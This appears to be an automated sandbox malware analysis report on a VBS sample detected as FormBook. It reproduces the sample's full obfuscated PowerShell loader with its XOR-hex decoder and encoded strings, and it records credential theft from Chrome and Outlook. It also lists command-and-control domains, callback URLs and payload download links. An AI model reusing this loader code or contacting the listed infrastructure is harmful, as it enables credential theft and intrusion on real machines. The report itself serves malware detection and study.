a'm2aff0p8g2hbj0s3a0pbt0s9p1d4a1fff2pbs0s9o0s2s1c3t0daf0s3b'd;r`$cshpfrigkee0r=icbruoaulpdibeurhsprb0g2z p'u2cbb1sfc2o2p0m3d0eas0s3o0i1l0t7a1u2k0d3p3n2a1tfr1k6m0h3l'o;d`$ussporfgceo1f=scrrnosufphikeirbsorr0f2b r'g2u5w0has0h7a1d5m1l5a4bad4s6b3g6j1a3s0w4d0rah0tfk0h5s4sal4p6s3d5p0f3l0g7e0eah0c3l0r2d4sam4r6t2u7r0h8g1n5s0hff2w5s0fac0k7k1b5u1h5d4bar4f6f2l7m1f3d1o2s0p9o2m5m0tap0p7c1p5s1s5i'f;s`$gsapcrugpee2u=kcjrcogugpsibesrpsert0t2s r'r2gfu0t8s1s0t0d9i0idf0c3g'p;m`$tsbparqgmeh3f=mcurdosuppfibemrasgrk0s2a k'g3c6k1a3v0a4p0aad0pfb0k5v4rac4h6c2seh0ufc0h2m0d3s2d4k1af	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function croupiersr02 { param([string]$tilbliv); $fodfst = $tilbliv.length; $skalletef = new-object byte[] ($fodfst / 2); for($dependens=0; $dependens -lt $fodfst; $dependens+=2){ $osteopla = $tilbliv.substring($dependens, 2); $skalletef[$dependens/2] = [convert]::tobyte($osteopla, 16); $skalletef[$dependens/2] = ($skalletef[$dependens/2] -bxor 102); } [string][system.text.encoding]::ascii.getstring($skalletef);}set-content 'e:\croupiersr03' '2';$depra = get-content 'e:\croupiersr03';$boug0=croupiersr02 '351f1512030b48020a0a';if ($depra -eq '2') {$boug0=''};$boug1=croupiersr02 '2b0f0514091509001248310f085554483308150700032807120f10032b03120e090215';$boug2=croupiersr02 '2103123614090527020214031515';$boug3=croupiersr02 '351f1512030b48341308120f0b03482f081203140916350314100f050315482e0708020a03340300';$boug4=croupiersr02 '1512140f0801';$boug5=croupiersr02 '2103122b0902130a032e0708020a03';$boug6=croupiersr02 '3432351603050f070a28070b034a462e0f0203241f350f014a463613040a0f05';$boug7=croupiersr02 '341308120f0b034a462b070807010302';$boug8=croupiersr02 '3403000a030512030222030a0301071203';$boug9=croupiersr02 '2f082b030b09141f2b0902130a03';$sprge0=croupiersr02 '2b1f22030a0301071203321f1603';$sprge1=croupiersr02 '250a0715154a463613040a0f054a463503070a03024a462708150f250a0715154a4627131209250a071515';$sprge2=croupiersr02 '2f0810090d03';$sprge3=croupiersr02 '3613040a0f054a462e0f0203241f350f014a46280311350a09124a46300f141213070a';$sprge4=croupiersr02 '300f141213070a270a0a0905';$sprge5=croupiersr02 '0812020a0a';$sprge6=croupiersr02 '281236140912030512300f141213070a2b030b09141f';$sprge7=croupiersr02 '2f233e';$sprge8=croupiersr02 '3a';$frekvenss=croupiersr02 '333523345554';$hematopat=croupiersr02 '25070a0a310f080209113614090527';function fkp {param ($fortrng49, $fjasende) ;$forth0 =croupiersr02 '420414070503141f0d465b464e3d27161622090b070f083b5c5c2513141403081222090b070f0848210312271515030b040a0f03154e4f461a46310e0314034b29040c030512461d46423948210a0904070a271515030b040a1f2507050e03464b270802464239482a090507120f09084835160a0f124e4235161401035e4f3d4b573b48231713070a154e4224091301564f461b4f48210312321f16034e4224091301574f';&($sprge7) $forth0;$forth5 = croupiersr02 '4227151203080f150b465b46420414070503141f0d482103122b03120e09024e4224091301544a463d321f16033d3b3b46264e4224091301554a464224091301524f4f';&($sprge7) $forth5;$forth1 = croupiersr02 '140312131408464227151203080f150b482f0810090d034e4208130a0a4a46264e3d351f1512030b48341308120f0b03482f081203140916350314100f050315482e0708020a033403003b4e2803114b29040c03051246351f1512030b48341308120f0b03482f081203140916350314100f050315482e0708020a033403004e4e2803114b29040c030512462f08123612144f4a464e420414070503141f0d482103122b03120e09024e4224091301534f4f482f0810090d034e4208130a0a4a46264e4220091412140801525f4f4f4f4f4a4642200c0715030802034f4f';&($sprge7) $forth1;}function gdt {param ([parame	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vakanc = """NFFuSnLcKtPiOoPnC ECFrsoBuBpSiGeFrdsCrU0J2h T{S A W S HpMaUrWaTmK(M[SSbtBrriTnMgA]U`$LTSiTlWbRlUitvC)B;P L`$MFMoUdLfUsStu P=M I`$ETMiSlMbElFiRvT.SLPeRnCgRtLhR;S A s V N`$TSUkBablflSeLtAeBfs P=U FNMekwR-GOSbTjUefcAtT FbTyOtIeN[T]D P(D`$UFwoDdPfUsStH C/u S2F)f;L M d S EFToKrS(S`$SdaeCpBeRnpdCeZnasH=F0a;I B`$BdGeSpreOnPdGeMnSsB P-KlBtM A`$PFFoKdafSsHtC;P U`$SdIeUpFeMnfdOeEnFsI+V=M2K)H{m a S u D`$CoYsPtTeAoEpUlRaA p=O A`$ITDiMlCbClBiOvB.GSTuGbBsStTrPiKnUgB(M`$OdFeSpLePnAdDeBnSsS,R S2F)A;E D A U M`$PSAkLaOlSlPeMtSeEfA[C`$UdSeFpSePnOdSeMnHsV/V2A]V D=B T[CcAoSnBvIeArBtT]V:J:ITFoHBFybtkeC(R`$FoBsHtDeMoVpSlfaP,D B1L6R)P;K D L`$SSBkUaSlSlReEtFeOfV[I`$RdPeSpLePnZdkeCnPsD/T2A]R C=u D(H`$NSUkVaTlClVeFtMeNfU[U`$DdUePpMeInBdNeBnLsE/P2I]O I-PbmxToBrS s1I0S2P)P;N O S U S}S R[PSTtPrDiEnTgB]u[ESAyRsAtBeBmm.STKeBxPtH.KEAnWcUoBdEiGnmgK]L:A:NAPSHCVIPIS.EGMeHtmSDttrEiCnVgL(S`$RSMkAaOlUlMeAtOeLfU)C;S}PSPeEtP-HCVoBnDtUeFnHtB n'BEM:S\ECOrMoSuCpNiSeSrBsKrE0U3H'A B'U2V'P;S`$tDmeCpLrUaR V=G AGSePtn-GCSoGnGtYeFnLtS G'SEL:M\RCRrsoTuIpLiCeArtsHrA0G3S'S;o`$RBEoUuKgN0T=PCgrHoLuApGiBeMrBsSrS0B2K T'H3A5P1OFA1F5E1P2b0A3P0UBo4F8M0L2B0wAB0CAL'S;GiGfU A(s`$TDKeEpnrAaK H-QeLqk P'O2B'R)f R{B`$uBcoNuCgE0W=M'S'M}F;P`$ABBoPuKgC1B=CCFrGoPuTpRiSeCrDsSrT0R2V T'S2IBB0uFP0B5A1G4B0M9N1A5K0F9s0D0T1F2H4k8V3S1L0uFD0S8G5v5N5G4S4T8S3D3P0S8V1S5m0T7S0A0U0A3M2P8F0B7O1N2H0RFw1J0T0P3j2CBS0F3M1s2H0SED0P9K0O2F1B5P'F;D`$IBNofuLgM2G=MCTruoEuSpCiTeIrSsIrT0O2l S'M2G1S0s3S1O2K3T6I1O4L0K9R0F5I2U7M0P2R0B2C1F4G0F3S1S5F1U5A'L;h`$TBKoVusgM3E=SCSrDoFuOpNiKeRrSsKrS0s2U X'A3M5O1fFT1S5K1D2F0A3o0SBW4H8D3D4U1M3s0K8E1S2A0VFL0HBI0S3O4S8P2HFC0I8e1P2B0F3R1W4S0T9P1T6W3G5P0E3F1D4S1B0P0SFR0A5B0B3T1O5U4G8E2BEP0C7H0B8S0C2b0CAH0n3B3F4T0Z3S0a0F'A;D`$ABNoQuMgT4H=CCDrBoDuSpPiCeTrZsHrD0M2t T'm1T5I1O2V1D4u0EFC0e8U0G1W'R;H`$SBPoKuLgc5s=GCurUoEuRpTiSeNrbsLrF0A2P P'R2O1T0O3U1S2D2TBV0P9H0U2F1C3B0nAG0N3S2KEE0L7B0O8S0F2V0uAR0W3D'U;S`$FBPoSuDgO6F=PCSrSoSuApTiSeTresSrT0h2S T'T3S4F3P2H3U5T1n6u0l3B0I5A0SFI0K7H0FAT2L8N0S7A0FBs0n3m4DAA4T6U2ZED0AFI0W2P0K3R2E4T1SFF3I5V0TFM0A1P4TAS4G6B3C6S1L3O0r4H0MAE0BFU0M5A'A;C`$SBIoTukgR7S=CCGrAoFufpCiUeCrUsUrB0E2W F'A3A4P1K3P0I8O1U2S0OFM0TBP0K3S4HAA4T6L2UBP0S7L0F8D0g7S0T1L0Z3A0M2E'S;P`$TBFoFuFgu8B=BCJrSoBuCpRiUePrPsTrM0S2H T'K3C4P0B3B0H0C0CAB0F3P0T5U1S2E0S3U0U2M2H2P0C3P0SAH0I3S0U1K0T7P1P2n0a3S'T;J`$GBSoLuFgM9V=ACerHoruOpPiSeTrDsNrS0N2N A'm2aFF0P8G2HBJ0S3A0PBt0S9P1D4A1FFF2PBS0S9O0S2S1C3t0DAf0S3B'D;R`$CSHpFrIgKeE0R=ICBrUoAuLpDiBeUrHsPrB0G2Z P'U2CBB1SFC2O2P0M3D0eAS0S3O0I1L0T7A1U2k0D3P3N2A1tFr1K6M0H3L'O;D`$USSpOrFgCeO1F=SCRrNoSuFpHiKeIrBsOrR0F2B R'G2U5W0HAS0H7A1D5M1L5A4BAd4S6B3G6J1A3S0W4D0RAH0TFK0H5S4SAL4P6S3D5P0F3L0G7e0EAH0C3l0r2d4SAM4R6T2U7R0H8g1N5S0HFF2W5S0FAC0K7K1B5U1H5d4BAR4F6F2L7m1F3D1O2S0p9O2M5M0TAp0P7C1P5S1S5I'f;S`$gSApCrUgPeE2U=KCJrCoGuGpSiBeSrPsErT0T2S R'R2gFU0t8S1S0T0D9I0IDF0C3G'P;M`$TSBpArQgMeh3F=MCurDosuPpFiBeMrAsGrK0S2A K'G3C6K1A3v0A4P0AAd0PFB0K5V4RAC4H6c2sEH0UFC0H2M0D3S2D4K1aF			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Croupiersr02 { param([String]$Tilbliv); $Fodfst = $Tilbliv.Length; $Skalletef = New-Object byte[] ($Fodfst / 2); For($dependens=0; $dependens -lt $Fodfst; $dependens+=2){ $osteopla = $Tilbliv.Substring($dependens, 2); $Skalletef[$dependens/2] = [convert]::ToByte($osteopla, 16); $Skalletef[$dependens/2] = ($Skalletef[$dependens/2] -bxor 102); } [String][System.Text.Encoding]::ASCII.GetString($Skalletef);}Set-Content 'E:\Croupiersr03' '2';$Depra = Get-Content 'E:\Croupiersr03';$Boug0=Croupiersr02 '351F1512030B48020A0A';if ($Depra -eq '2') {$Boug0=''};$Boug1=Croupiersr02 '2B0F0514091509001248310F085554483308150700032807120F10032B03120E090215';$Boug2=Croupiersr02 '2103123614090527020214031515';$Boug3=Croupiersr02 '351F1512030B48341308120F0B03482F081203140916350314100F050315482E0708020A03340300';$Boug4=Croupiersr02 '1512140F0801';$Boug5=Croupiersr02 '2103122B0902130A032E0708020A03';$Boug6=Croupiersr02 '3432351603050F070A28070B034A462E0F0203241F350F014A463613040A0F05';$Boug7=Croupiersr02 '341308120F0B034A462B070807010302';$Boug8=Croupiersr02 '3403000A030512030222030A0301071203';$Boug9=Croupiersr02 '2F082B030B09141F2B0902130A03';$Sprge0=Croupiersr02 '2B1F22030A0301071203321F1603';$Sprge1=Croupiersr02 '250A0715154A463613040A0F054A463503070A03024A462708150F250A0715154A4627131209250A071515';$Sprge2=Croupiersr02 '2F0810090D03';$Sprge3=Croupiersr02 '3613040A0F054A462E0F0203241F350F014A46280311350A09124A46300F141213070A';$Sprge4=Croupiersr02 '300F141213070A270A0A0905';$Sprge5=Croupiersr02 '0812020A0A';$Sprge6=Croupiersr02 '281236140912030512300F141213070A2B030B09141F';$Sprge7=Croupiersr02 '2F233E';$Sprge8=Croupiersr02 '3A';$Frekvenss=Croupiersr02 '333523345554';$Hematopat=Croupiersr02 '25070A0A310F080209113614090527';function fkp {Param ($Fortrng49, $Fjasende) ;$Forth0 =Croupiersr02 '420414070503141F0D465B464E3D27161622090B070F083B5C5C2513141403081222090B070F0848210312271515030B040A0F03154E4F461A46310E0314034B29040C030512461D46423948210A0904070A271515030B040A1F2507050E03464B270802464239482A090507120F09084835160A0F124E4235161401035E4F3D4B573B48231713070A154E4224091301564F461B4F48210312321F16034E4224091301574F';&($Sprge7) $Forth0;$Forth5 = Croupiersr02 '4227151203080F150B465B46420414070503141F0D482103122B03120E09024E4224091301544A463D321F16033D3B3B46264E4224091301554A464224091301524F4F';&($Sprge7) $Forth5;$Forth1 = Croupiersr02 '140312131408464227151203080F150B482F0810090D034E4208130A0A4A46264E3D351F1512030B48341308120F0B03482F081203140916350314100F050315482E0708020A033403003B4E2803114B29040C03051246351F1512030B48341308120F0B03482F081203140916350314100F050315482E0708020A033403004E4E2803114B29040C030512462F08123612144F4A464E420414070503141F0D482103122B03120E09024E4224091301534F4F482F0810090D034E4208130A0A4A46264E4220091412140801525F4F4F4F4F4A4642200C0715030802034F4F';&($Sprge7) $Forth1;}function GDT {Param ([Parame			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 0000000D.00000002.498599133.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.498760711.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.781212981.0000000002730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.779930752.0000000000280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\cmd.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 0000000D.00000002.498599133.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.498760711.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.781212981.0000000002730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.779930752.0000000000280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	511 Process Injection	11 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	4 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	221 Scripting	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	221 Scripting	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Shared Modules	Logon Script (Windows)	Logon Script (Windows)	4 Obfuscated Files or Information	Security Account Manager	221 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	4 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	21 Command and Scripting Interpreter	Logon Script (Mac)	Logon Script (Mac)	131 Virtualization/Sandbox Evasion	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	Scheduled Transfer	15 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	1 PowerShell	Network Logon Script	Network Logon Script	511 Process Injection	LSA Secrets	131 Virtualization/Sandbox Evasion	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
GlobalImagingDocuments9575734549684.vbs	0%	ReversingLabs

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.ghostdyes.net/g0c0/?J1ZahCdL=/cYLdyO2qITEXYcdEKysiTG/0kILWa8EGExoyl7LQW7KzQM/3grhKHlpqc3WrobEjk7g5cW8f2voA2pa0pIYVA7MQ8uZkEgdBjrf6G57J+B7&uEk=kKVhb1ODb	0%	Avira URL Cloud	safe
http://www.denko-kosan.com/g0c0/?J1ZahCdL=/6Er6B5poJy6uHF8k8/pGsLsu4euo955QrzgoZ5Znatjjq1COwyHxIeo18D9pRj5Ci1gcOGYIaPue4yNBcevRXCJfkbYK/JSWMth+St+cVQ7&uEk=kKVhb1ODb	0%	Avira URL Cloud	safe
http://www.shivanshnegi.com/g0c0/?J1ZahCdL=C0KZfCw3M9dgcVMegUaXT5mHrabIsWwgKIwZghABK/zPnQmv2J3/nbZH+UKlayZCqk+j1NVXNAMuRNCfj24K4Q5P5C8DM0dqWdfKhTZFySIl&uEk=kKVhb1ODb	0%	Avira URL Cloud	safe
http://www.deepee.xyz/g0c0/?J1ZahCdL=8Jyym6YpCYcRPCA/1odg0ZVgTkbvAinOe9o7VzVA3jLVPgNwCUCgU3fRCFjwhyyCtxnZmCY1Y9AJ7NYgKKttQoxHX67xeHFuAGt1Gr3SwKhB&uEk=kKVhb1ODb	0%	Avira URL Cloud	safe
http://www.nichevesting.com/g0c0/	0%	Avira URL Cloud	safe
http://www.xn--lst4d-fwa.site/g0c0/	0%	Avira URL Cloud	safe
http://www.xn--lst4d-fwa.site/g0c0/?J1ZahCdL=kWznJ2YswSL+LAAx9ZHUexIk0ycyRshautolqpnZVVrlJdt47ZaoNZmL7kdhIFbI+ihPlFcDQCWCpz3M8AfRW2Sbj71MdTjzXr3aV4lJwzwy&uEk=kKVhb1ODb	0%	Avira URL Cloud	safe
http://www.julesgifts.co.uk/g0c0/	0%	Avira URL Cloud	safe
http://www.denko-kosan.com/g0c0/	0%	Avira URL Cloud	safe
http://www.nichevesting.com/g0c0/?J1ZahCdL=4D8KR/+l2rJ4yEknA3NwL/xew2D800GqbWuv46luKoyREYUfmcWzY8S0FaFCA4RxGPUwgCES1+CGDKu8j/pMqbkqVClt2I2j7UamBTzpVw1B&uEk=kKVhb1ODb	0%	Avira URL Cloud	safe
http://www.chemkimcorp.com/g0c0/	0%	Avira URL Cloud	safe
http://www.star-house.okinawa/g0c0/?J1ZahCdL=FDm8rKKDmQD/I16UESZCScQJd5RkugjO7i+IXGcmdNvbCKiIDHrvo4AwKUGq/V+xVbt3++Blt9ecK1dyBRpOcdYFF1CFhWNWgdQRY0tY801v&uEk=kKVhb1ODb	0%	Avira URL Cloud	safe
http://www.bebas88official.click/g0c0/	100%	Avira URL Cloud	phishing
http://crl3.8	0%	Avira URL Cloud	safe
http://www.deepee.xyz/g0c0/	0%	Avira URL Cloud	safe
http://www.ghostdyes.net/g0c0/	0%	Avira URL Cloud	safe
http://www.bebas88official.click/g0c0/?J1ZahCdL=7AoghRD8g0/kfvEsx2sU95A2LZSx6NsCVfQQj+6UBm4+ru4nOpfQ9Q9UKAYKj24R1kRNFhy6UoFNSsJ6pUxzKJj896DDYPcMBEzuDMgRmTEe&uEk=kKVhb1ODb	100%	Avira URL Cloud	phishing
http://www.bestservicesandtrade.org/g0c0/?J1ZahCdL=Ssx6YM16hj7Dv4NxMqBhL/VgmmEJsfNRJMtf4nUH3Oq+Hm/bZsBBuE50eRLU4xhus+IRzU4TY0HA5BfycHQ3+Whne8bGtbEpvMOauzDGx7DW&uEk=kKVhb1ODb	0%	Avira URL Cloud	safe
http://www.bestservicesandtrade.org/g0c0/	0%	Avira URL Cloud	safe
http://www.julesgifts.co.uk/g0c0/?J1ZahCdL=LvoLDBvSBwADsyk8OFhB+eEYCloM5F4PvHVBhfoVTxA9RuBvaY3JKeLz6WT2wF14Jhg7cGkNOjhTPTUiw+ZdZP048csFAvWlDrGxEsvZ5gpq&uEk=kKVhb1ODb	0%	Avira URL Cloud	safe
http://www.shivanshnegi.com/g0c0/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
td-ccm-168-233.wixdns.net	34.117.168.233	true	false	high
www.nichevesting.com	52.20.84.62	true	false	high
www.deepee.xyz	162.0.236.127	true	false	high
www.xn--lst4d-fwa.site	104.21.67.180	true	false	high
c-0001.c-msedge.net	13.107.4.50	true	false	high
www.star-house.okinawa	183.181.84.3	true	false	high
shivanshnegi.com	66.235.200.145	true	false	high
bebas88official.click	172.96.191.163	true	false	high
www.julesgifts.co.uk	212.227.172.253	true	false	high
drive.google.com	142.250.203.110	true	false	high
denko-kosan.com	49.212.180.95	true	false	high
bestservicesandtrade.org	208.109.43.28	true	false	high
googlehosted.l.googleusercontent.com	172.217.168.65	true	false	high
www.denko-kosan.com	unknown	unknown	false	high
www.shivanshnegi.com	unknown	unknown	false	high
www.chemkimcorp.com	unknown	unknown	false	high
doc-14-7s-docs.googleusercontent.com	unknown	unknown	false	high
www.bebas88official.click	unknown	unknown	false	high
www.bestservicesandtrade.org	unknown	unknown	false	high
www.ghostdyes.net	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.ghostdyes.net/g0c0/?J1ZahCdL=/cYLdyO2qITEXYcdEKysiTG/0kILWa8EGExoyl7LQW7KzQM/3grhKHlpqc3WrobEjk7g5cW8f2voA2pa0pIYVA7MQ8uZkEgdBjrf6G57J+B7&uEk=kKVhb1ODb	true	Avira URL Cloud: safe	unknown
http://www.shivanshnegi.com/g0c0/?J1ZahCdL=C0KZfCw3M9dgcVMegUaXT5mHrabIsWwgKIwZghABK/zPnQmv2J3/nbZH+UKlayZCqk+j1NVXNAMuRNCfj24K4Q5P5C8DM0dqWdfKhTZFySIl&uEk=kKVhb1ODb	true	Avira URL Cloud: safe	unknown
https://doc-14-7s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/qspainn16n64l8j7o5p977ji1aeg2b86/1677773850000/00214763071378112578/*/1IuicZ_8vQE9dU4bfx34MrSLFAhHaLs1l?e=download&uuid=cb10c202-86bb-4a69-9700-bc9cbb433bf0	false		high
http://www.nichevesting.com/g0c0/	true	Avira URL Cloud: safe	unknown
http://www.denko-kosan.com/g0c0/?J1ZahCdL=/6Er6B5poJy6uHF8k8/pGsLsu4euo955QrzgoZ5Znatjjq1COwyHxIeo18D9pRj5Ci1gcOGYIaPue4yNBcevRXCJfkbYK/JSWMth+St+cVQ7&uEk=kKVhb1ODb	true	Avira URL Cloud: safe	unknown
https://doc-14-7s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/96aecif6qgtmd866k395ve9ln4v2582p/1677773925000/00214763071378112578/*/1rIzD7daHU1mUfnDyXK-I-Gb1F3sb7xu2?e=download&uuid=1de4a321-c39e-4208-95ca-f1884cd889bf	false		high
http://www.deepee.xyz/g0c0/?J1ZahCdL=8Jyym6YpCYcRPCA/1odg0ZVgTkbvAinOe9o7VzVA3jLVPgNwCUCgU3fRCFjwhyyCtxnZmCY1Y9AJ7NYgKKttQoxHX67xeHFuAGt1Gr3SwKhB&uEk=kKVhb1ODb	true	Avira URL Cloud: safe	unknown
http://www.xn--lst4d-fwa.site/g0c0/	true	Avira URL Cloud: safe	unknown
http://www.xn--lst4d-fwa.site/g0c0/?J1ZahCdL=kWznJ2YswSL+LAAx9ZHUexIk0ycyRshautolqpnZVVrlJdt47ZaoNZmL7kdhIFbI+ihPlFcDQCWCpz3M8AfRW2Sbj71MdTjzXr3aV4lJwzwy&uEk=kKVhb1ODb	true	Avira URL Cloud: safe	unknown
http://www.denko-kosan.com/g0c0/	true	Avira URL Cloud: safe	unknown
http://www.julesgifts.co.uk/g0c0/	true	Avira URL Cloud: safe	unknown
http://www.nichevesting.com/g0c0/?J1ZahCdL=4D8KR/+l2rJ4yEknA3NwL/xew2D800GqbWuv46luKoyREYUfmcWzY8S0FaFCA4RxGPUwgCES1+CGDKu8j/pMqbkqVClt2I2j7UamBTzpVw1B&uEk=kKVhb1ODb	true	Avira URL Cloud: safe	unknown
http://www.chemkimcorp.com/g0c0/	true	Avira URL Cloud: safe	unknown
http://www.bebas88official.click/g0c0/	true	Avira URL Cloud: phishing	unknown
http://www.star-house.okinawa/g0c0/?J1ZahCdL=FDm8rKKDmQD/I16UESZCScQJd5RkugjO7i+IXGcmdNvbCKiIDHrvo4AwKUGq/V+xVbt3++Blt9ecK1dyBRpOcdYFF1CFhWNWgdQRY0tY801v&uEk=kKVhb1ODb	true	Avira URL Cloud: safe	unknown
http://www.bebas88official.click/g0c0/?J1ZahCdL=7AoghRD8g0/kfvEsx2sU95A2LZSx6NsCVfQQj+6UBm4+ru4nOpfQ9Q9UKAYKj24R1kRNFhy6UoFNSsJ6pUxzKJj896DDYPcMBEzuDMgRmTEe&uEk=kKVhb1ODb	true	Avira URL Cloud: phishing	unknown
http://www.ghostdyes.net/g0c0/	true	Avira URL Cloud: safe	unknown
http://www.deepee.xyz/g0c0/	true	Avira URL Cloud: safe	unknown
http://www.bestservicesandtrade.org/g0c0/	true	Avira URL Cloud: safe	unknown
http://www.bestservicesandtrade.org/g0c0/?J1ZahCdL=Ssx6YM16hj7Dv4NxMqBhL/VgmmEJsfNRJMtf4nUH3Oq+Hm/bZsBBuE50eRLU4xhus+IRzU4TY0HA5BfycHQ3+Whne8bGtbEpvMOauzDGx7DW&uEk=kKVhb1ODb	true	Avira URL Cloud: safe	unknown
http://www.shivanshnegi.com/g0c0/	true	Avira URL Cloud: safe	unknown
http://www.julesgifts.co.uk/g0c0/?J1ZahCdL=LvoLDBvSBwADsyk8OFhB+eEYCloM5F4PvHVBhfoVTxA9RuBvaY3JKeLz6WT2wF14Jhg7cGkNOjhTPTUiw+ZdZP048csFAvWlDrGxEsvZ5gpq&uEk=kKVhb1ODb	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl3.8	wscript.exe, 00000000.00000002.266723885.0000026B15490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.265560873.0000026B1547D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
